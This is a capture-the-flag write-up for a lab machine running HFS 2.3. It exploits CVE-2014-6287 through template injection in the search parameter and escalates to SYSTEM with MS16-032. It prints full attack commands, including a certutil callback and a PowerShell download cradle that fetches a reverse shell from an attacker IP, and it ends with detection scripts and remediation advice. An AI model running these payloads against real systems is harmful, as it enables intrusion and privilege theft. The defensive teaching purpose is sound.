Overview
Optimum exposes a single service: HttpFileServer (HFS) 2.3 by Rejetto on port 80. No other ports are open. The server runs on Windows Server 2012 R2 with 31 hotfixes, all from 2014. Over a decade of critical updates are missing.
HFS 2.3 is vulnerable to CVE-2014-6287, a remote code execution flaw in the
search parameter. A null byte terminates the search string, and subsequent
content is interpreted as HFS template directives. The {.exec|cmd.} directive
executes operating system commands as the kostas user. Privilege escalation
uses MS16-032, a race condition in the Windows Secondary Logon Service, but
requires navigating a 32-bit/64-bit architecture mismatch.
Reconnaissance
I scan all 65535 ports to ensure nothing is hidden:
nmap -sC -sV -p- --min-rate 5000 10.129.15.118
| Port | Service | Product / Version | Notes |
|---|---|---|---|
| 80 | HTTP | HttpFileServer httpd 2.3 | Default HFS directory listing |
Only port 80 is open. No SSH, no RDP, no SMB. The attack surface is entirely the web service.
curl -sI http://10.129.15.118/
# Server: HFS 2.3
# Set-Cookie: HFS_SID_=0.208266498241574; path=/;
The HFS web interface presents a file server with a built-in search function. No authentication is required to access the interface or search.
Attack Surface Analysis
HFS 2.3 implements a custom scripting language for template processing.
Directives like {.exec|command.} execute OS commands. The search parameter
flows through the template engine without sanitisation. This is CVE-2014-6287.
| Attribute | Value |
|---|---|
| CVE | CVE-2014-6287 |
| CVSS v3.1 | 9.8 (Critical) |
| CWE | CWE-94 (Code Injection) |
| Root cause | Null byte terminates search string; trailing content parsed as template directives |
| Affected | HFS 2.3 |
| MITRE ATT&CK | T1190 (Exploit Public-Facing Application) |
Vulnerability Analysis
The exploit URL format is: http://TARGET/?search=%00{.exec|COMMAND.}. The
%00 null byte terminates the search query from the application's perspective,
but subsequent bytes still reach the template parser. The {.exec|COMMAND.}
directive is evaluated by HFS, executing the enclosed command via cmd.exe /c.
This is a textbook template injection. The application fails to separate data from code: user input intended as a search query is processed as executable template syntax.
Exploitation
Step 1: Confirm code execution
I use a certutil callback to validate that commands reach the operating system:
# Attacker: start HTTP listener
python3 -m http.server 8080
# Trigger HFS exec directive
curl -s "http://10.129.15.118/?search=%00{.exec|certutil+-urlcache+-split+-f+http://10.10.14.5:8080/ping.txt+C:\Users\kostas\ping.txt.}"
# Attacker HTTP server log:
# 10.129.15.118 - "GET /ping.txt HTTP/1.1" 404 -
The 404 confirms the target made an outbound HTTP request. Code execution is confirmed.
Step 2: Obtain reverse shell
Complex PowerShell commands fail through the HFS template parser due to
special character handling. The solution is to host a PowerShell script and
download it with IEX:
# Host Nishang reverse shell script
python3 -m http.server 8080
# Trigger download and execution via 64-bit PowerShell
curl -s "http://10.129.15.118/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe+IEX(New-Object+Net.WebClient).DownloadString('http://10.10.14.5:8080/rev.ps1').}"
nc -lnvp 4444
# Connection from 10.129.15.118:49267
# PS C:\Users\kostas\Desktop> whoami
# optimum\kostas
The SysNative path is critical. The HFS process runs as 32-bit under WoW64
on a 64-bit OS. Using SysNative invokes the native 64-bit PowerShell,
which is required for the MS16-032 exploit later.
Step 3: Privilege escalation with MS16-032
Post-exploitation enumeration reveals the situation:
whoami /priv
# SeChangeNotifyPrivilege Bypass traverse checking Enabled
No SeImpersonatePrivilege. Potato-family attacks are ruled out. With 31
hotfixes all from 2014 and KB3139914 (MS16-032 patch) absent, kernel
exploitation is the path forward.
MS16-032 exploits a race condition in the Secondary Logon Service
(seclogon). It requires two or more logical processors and a 64-bit
PowerShell context. The SYSTEM process spawned by the exploit cannot make
outbound network connections (Windows Firewall blocks them), so I use
icacls to grant file access instead of spawning a reverse shell:
# From 64-bit PowerShell
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5:8080/Invoke-MS16032.ps1'); Invoke-MS16032 -Command 'cmd /c icacls C:\Users\Administrator\Desktop /grant kostas:F /T'"
# [+] Windows 10 x64 with 2 logical processors
# [+] Token duplication succeeded
# [+] CreateProcessWithLogonW completed
The “Windows 10 x64” banner is hardcoded in the Empire script; the actual OS
is Server 2012 R2 as confirmed by systeminfo.
PS> type C:\Users\Administrator\Desktop\root.txt
[flag redacted]
Post-Exploitation
Both flags captured. System enumeration confirms the patch deficit:
systeminfo
# OS Name: Microsoft Windows Server 2012 R2 Standard
# OS Version: 6.3.9600 N/A Build 9600
# System Type: x64-based PC
# Hotfix(s): 31 Hotfix(s) Installed.
# [01]: KB2938066
# ...
# [31]: KB3014442
All 31 hotfixes date from 2014. The most recent is KB3014442. The system has received no updates for over a decade. KB3139914 (MS16-032 patch) is absent, as is every subsequent security update.
The kostas user is a standard account with no administrative group
membership. The entire escalation path depended on the missing patch and the
architecture mismatch requiring careful selection of the PowerShell binary.
An operational note on HFS reliability: the exec handler stops processing
new {.exec} directives after approximately 10 to 15 invocations. The
handler silently fails. Operational discipline dictates limiting to 3 commands
per engagement. If the handler degrades, the target VM must be reset.
In a production environment, the SYSTEM token could be used for credential extraction with Mimikatz, creation of new administrator accounts, or lateral movement to domain-joined machines.
Defensive Analysis
Detection opportunities
| Phase | MITRE ATT&CK | Detection |
|---|---|---|
| Initial access | T1190 | WAF rule matching %00{.exec in query strings |
| Execution | T1059.001 | PowerShell downloading and executing remote scripts |
| Priv escalation | T1068 | MS16-032: seclogon service creating processes with SYSTEM token |
| Persistence | T1222.001 | icacls modifying NTFS permissions on Administrator profile |
Network-level: The null byte followed by {.exec in HTTP query strings is
a distinctive signature. Any web application firewall blocking null bytes in
parameters would prevent this attack entirely.
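The null-byte-then-directive pattern described in the vulnerability analysis above is easy to express as detection logic. The following is added example code (not part of the original writeup): it reads constructed common-log-format lines, decodes each query parameter exactly once, and grades a null byte followed by an HFS macro opener as critical, a bare null byte as high, and macro syntax without a null byte as medium. The sample log lines and the severity labels are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed access-log lines in common log format (not captured from the target).
# Line 2 is the CVE-2014-6287 shape from this writeup; lines 3 and 4 are near misses.
SAMPLE_LOG = """
10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?search=report HTTP/1.1" 200 1234
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?search=%00{.exec|certutil+-urlcache+-f+http://10.10.14.5:8080/x.txt.} HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?search=%2500{.exec|whoami.} HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?search=%00 HTTP/1.1" 200 512
"""

REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MACRO_RE = re.compile(rb'\{\.[A-Za-z_]+')  # HFS macro opener such as {.exec


def classify_query(query: str):
    """Classify one still-percent-encoded query string.

    Returns a list of (severity, parameter, reason). Decoding happens once,
    which is what the server sees; %2500 therefore stays a literal "%00".
    """
    findings = []
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        raw = unquote_to_bytes(value)
        null_at = raw.find(b'\x00')
        macro_positions = [m.start() for m in MACRO_RE.finditer(raw)]
        if null_at >= 0 and any(p > null_at for p in macro_positions):
            findings.append(('critical', name, 'null byte followed by HFS macro (CVE-2014-6287 pattern)'))
        elif null_at >= 0:
            findings.append(('high', name, 'null byte in query parameter'))
        elif macro_positions:
            findings.append(('medium', name, 'HFS macro syntax in query parameter'))
    return findings


def scan_access_log(log_text: str):
    """Return (line_number, severity, parameter, reason) for each suspicious request."""
    alerts = []
    for lineno, line in enumerate(log_text.strip().splitlines(), start=1):
        match = REQ_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group('target')).query
        for severity, param, reason in classify_query(query):
            alerts.append((lineno, severity, param, reason))
    return alerts


if __name__ == '__main__':
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

The single-decode choice is deliberate: a WAF that decodes more aggressively than the application behind it will alert on requests the server never interprets as null bytes.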
Host-level: PowerShell IEX(New-Object Net.WebClient).DownloadString()
is one of the most commonly flagged patterns in endpoint detection. Script
block logging (introduced in PowerShell 5.0, available on this OS via update)
would capture the full payload.
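As a host-level counterpart, here is added example code (not from the writeup) that applies a small rule set to PowerShell script block text of the kind script block logging records (Event ID 4104). It folds backtick escapes, case and whitespace before matching, so the cradle used in this writeup is caught in its plain and lightly mangled forms; it also flags the execution-policy bypass and the Sysnative PowerShell path noted in the takeaways. The sample blocks, rule names and severities are constructed.

```python
import re

# Constructed ScriptBlockText samples (Event ID 4104), not captured from the target.
SAMPLE_BLOCKS = {
    'benign': 'Get-ChildItem C:\\Users\\kostas\\Documents | Where-Object Length -gt 1MB',
    'cradle': "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.5:8080/rev.ps1')",
    'obfuscated': "IE`X (NEW-OBJECT  net.webclient).downloadSTRING( 'http://10.10.14.5:8080/x.ps1' )",
    'sysnative': '& C:\\Windows\\Sysnative\\WindowsPowerShell\\v1.0\\powershell.exe -ep bypass -c hostname',
}

# (rule name, severity, regex applied to the normalized text)
RULES = [
    ('download_cradle', 'high',
     r'(iex|invoke-expression)\s*\(\s*new-object\s+(system\.)?net\.webclient\s*\)\s*\.\s*downloadstring'),
    ('execution_policy_bypass', 'medium', r'-(ep|executionpolicy)\s+bypass'),
    ('sysnative_powershell', 'medium', r'\\sysnative\\windowspowershell\\'),
]
SEVERITY_ORDER = {'high': 0, 'medium': 1}


def normalize(script: str) -> str:
    """Fold cheap obfuscations: backtick escapes, mixed case and extra whitespace."""
    text = script.replace('`', '')
    text = re.sub(r'\s+', ' ', text)
    return text.lower()


def analyze_script_block(script: str):
    """Return [(rule name, severity)] for every rule that matches, highest severity first."""
    text = normalize(script)
    hits = [(name, sev) for name, sev, pattern in RULES if re.search(pattern, text)]
    return sorted(hits, key=lambda hit: SEVERITY_ORDER[hit[1]])


if __name__ == '__main__':
    for label, block in SAMPLE_BLOCKS.items():
        print(label, analyze_script_block(block))
```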
Remediation
| Priority | Action | Effort | Impact |
|---|---|---|---|
| P0 | Remove HFS 2.3 or upgrade to a maintained file server | Low | Critical |
| P0 | Apply all Windows updates (system is 10+ years behind) | Medium | Critical |
| P1 | Deploy a WAF blocking null bytes in query parameters | Low | High |
| P1 | Enable PowerShell Constrained Language Mode | Low | High |
| P2 | Implement application whitelisting | Medium | Medium |
| P2 | Enable PowerShell script block logging | Low | Medium |
HFS 2.3 is abandonware. Rejetto released HFS 3.x as a complete rewrite, but the 2.x branch is unmaintained. The correct action is replacement, not upgrade.
Key Takeaways
- Null byte injection is a recurring attack pattern. The null byte terminates strings in C-based parsers but not in higher-level template engines. Any application that processes user input through multiple parsing layers with different null byte semantics is a candidate for this class of vulnerability.
- Architecture mismatches complicate exploitation and detection. The 32-bit HFS process running on a 64-bit OS meant kernel exploits had to be launched from a specific PowerShell path. Defenders should monitor for processes accessing C:\Windows\Sysnative as this is often a sign of WoW64 exploitation.
- Network isolation limits post-exploitation options. Windows Firewall blocking outbound connections from the SYSTEM process forced a different approach (NTFS permission modification instead of reverse shell). This is a useful defensive control, but it does not prevent the escalation itself.